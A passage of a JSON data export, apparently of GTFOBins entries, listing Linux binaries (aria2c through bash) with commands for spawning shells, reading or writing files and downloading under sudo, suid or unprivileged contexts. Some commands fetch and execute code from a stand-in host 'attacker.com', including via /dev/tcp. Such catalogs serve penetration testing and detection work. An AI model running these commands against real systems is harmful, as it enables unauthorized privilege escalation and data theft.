GID.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:arj:file-read:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-read:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-read:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arp:file-read:0:sudo","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:arp:file-read:0:suid","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:arp:file-read:0:unprivileged","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:as:file-read:0:sudo","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:as:file-read:0:suid","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:as:file-read:0:unprivileged","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:ascii-xfr:file-read:0:sudo","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii-xfr:file-read:0:suid","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii-xfr:file-read:0:unprivileged","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii85:file-read:0:sudo","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii85/"]},{"id":"gtfo:ascii85:file-read:0:unprivileged","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii85/"]},{"id":"gtfo:ash:file-write:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:file-write:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:file-write:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:aspell:file-read:0:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:0:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:0:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:asterisk:shell:0:sudo","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:asterisk:shell:0:suid","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:asterisk:shell:0:unprivileged","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:at:command:0:sudo","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:command:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:shell:0:sudo","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:shell:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:atobm:file-read:0:sudo","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:atobm:file-read:0:suid","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:atobm:file-read:0:unprivileged","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:autoconf:shell:0:sudo","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoconf/"]},{"id":"gtfo:autoconf:shell:0:unprivileged","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoconf/"]},{"id":"gtfo:autoheader:shell:0:sudo","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoheader/"]},{"id":"gtfo:autoheader:shell:0:unprivileged","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoheader/"]},{"id":"gtfo:autoreconf:shell:0:sudo","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoreconf/"]},{"id":"gtfo:autoreconf:shell:0:unprivileged","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoreconf/"]},{"id":"gtfo:aws:file-read:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:file-read:0:suid","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:file-read:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:inherit:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:inherit:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:base32:file-read:0:sudo","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base32:file-read:0:suid","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base32:file-read:0:unprivileged","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base58:file-read:0:sudo","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base58/"]},{"id":"gtfo:base58:file-read:0:unprivileged","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base58/"]},{"id":"gtfo:base64:file-read:0:sudo","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:base64:file-read:0:suid","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:base64:file-read:0:unprivileged","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:basenc:file-read:0:sudo","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basenc:file-read:0:suid","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basenc:file-read:0:unprivileged","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basez:file-read:0:sudo","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:basez:file-read:0:suid","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:basez:file-read:0:unprivileged","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:bash:download:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } 